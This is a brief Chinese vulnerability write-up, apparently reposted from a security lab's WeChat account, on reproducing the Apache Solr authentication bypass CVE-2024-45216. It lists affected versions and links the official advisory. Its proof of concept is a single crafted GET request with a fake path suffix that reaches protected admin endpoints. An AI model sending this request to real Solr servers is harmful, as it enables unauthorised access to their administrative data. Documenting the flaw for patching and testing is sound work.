本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!
Apache Solr是美国阿帕奇(Apache)基金会的一款基于Lucene(一款全文搜索引擎)的搜索服务器。该产品支持层面搜索、垂直搜索、高亮显示搜索结果等。
Apache Solr 5.3.0至8.11.4之前版本和9.0.0至9.7.0之前版本存在安全漏洞,该漏洞源于存在身份验证不当漏洞,从而可使用虚假URL路径结尾绕过身份验证。
1.访问漏洞环境
POC
漏洞复现
GET /solr/admin/info/properties:/admin/info/key HTTP/1.1
Host: 127.0.0.1
SolrAuth: XXXXX
测试,通过响应判断漏洞存在。
3.nuclei文件测试
https://solr.apache.org/security.html#cve-2024-45216-apache-solr-authentication-bypass-possible-using-a-fake-url-path-ending
原文始发于微信公众号(弥天安全实验室):【成功复现】Apache Solr身份认证绕过漏洞(CVE-2024-45216)
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论